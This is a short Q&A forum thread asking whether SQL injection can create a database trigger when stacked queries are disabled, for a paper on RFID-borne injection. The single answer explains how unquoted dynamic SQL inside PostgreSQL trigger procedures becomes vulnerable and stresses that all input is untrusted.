Create database triggers with sql-injection without stacked queries

0 votes
asked Mar 27, 2010 by henri

Currently im working on a research paper about sql-injection with RFID tags and Im curious if it is possible to create a database trigger with an sql injections if stacked queries are disabled. If stacked queries are enabled, of course it is easy (assuming you know the table layout), but what if they're disabled for security reasons.

The question is if it is possible to create a trigger, given that there is an SQL injection. Database does not matter, choose one that fits the needs.

1 Answer

0 votes
answered Mar 4, 2010 by frank-heikens

What database are looking for? In PostgreSQL every trigger calls a stored procedure. Inside a stored procedure, you can execute dynamic queries if you want. If you don't do anything against SQL injection, not using quote_ident() and/or quote_literal(), your procedure is vulnerable to SQL injection. That's your own choice.

Userinput can never be trusted, so why the worry about RFID input? It's input, therefore it can't be trusted.

Welcome to Q&A, where you can ask questions and receive answers from other members of the community.
Website Online Counter